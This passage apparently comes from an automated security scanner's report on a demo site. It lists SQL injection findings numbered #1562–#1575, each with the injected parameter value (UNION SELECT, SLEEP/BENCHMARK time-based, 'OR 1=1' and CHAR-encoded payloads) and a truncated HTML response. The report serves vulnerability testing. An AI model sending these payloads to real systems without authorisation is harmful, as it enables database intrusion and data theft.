href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1562\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1563\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# SLEEP(1)/*' or SLEEP(1) or '\" or SLEEP(1) or \"*/\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1564\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1565\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1566\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or 1=1 or ''='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1567\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1568\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1569\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# (SELECT * FROM (SELECT(SLEEP(5)))ecMj)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1570\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' OR 'x'='x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1571Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \"\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1572\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# SLEEP(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1573\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1574\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# SLEEP(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1575\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 